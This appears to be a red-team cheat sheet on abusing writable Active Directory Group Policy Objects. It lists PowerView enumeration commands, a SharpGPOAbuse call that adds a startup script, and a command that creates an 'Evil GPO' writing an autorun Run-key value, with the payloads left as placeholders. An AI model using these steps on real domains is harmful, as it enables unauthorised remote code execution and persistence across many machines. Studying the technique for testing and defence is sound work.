Introduction
A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.
If domain users can modify a GPO, it can lead to several problems like having RCE on a machine.
Modifiable GPOs
1. Enumerate modifiable GPOs
Copy Get-DomainGPO | Get-DomainObjectAcl - ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" } 2. If there is any, resolve its GPO name and the SID of the principal.
Copy Get-DomainGPO - Identity "<ObjectDN>" | select displayName , gpcFileSysPath
ConvertFrom-SID < SecurityIdentifier > 3. Find out the OU where the GPO appears.
Copy Get-DomainOU - GPLink "{RelativeDN}" | select distinguishedName 4. Get the computer where the GPO applies.
Copy Get-DomainComputer - SearchBase "<OU_distinguishedname>" | select dnsHostName 5. Modify the GPO
Copy . \ SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>" 6. Wait for the GPO to take effect (20 minutes or so).
Principals with Create groupPolicyContainer objects privilege
1. Enumerate principals (Users/groups) that can create new GPOs in the domain.
Copy Get-DomainObjectAcl - Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" - ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier } 2. Look for OUs with "WriteProperty" on the attribute "GP-LINK".
3. Become the principal and create a GPO
ℹ️ Because we are using the autorun key registry, the workstation must be restarted so the payload is executed.
Copy Set-GPPrefRegistryValue - Name "Evil GPO" - Context Computer - Action Create - Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" - ValueName "Updater" - Value "<COMMAND>" - Type ExpandString Last updated 10 months ago
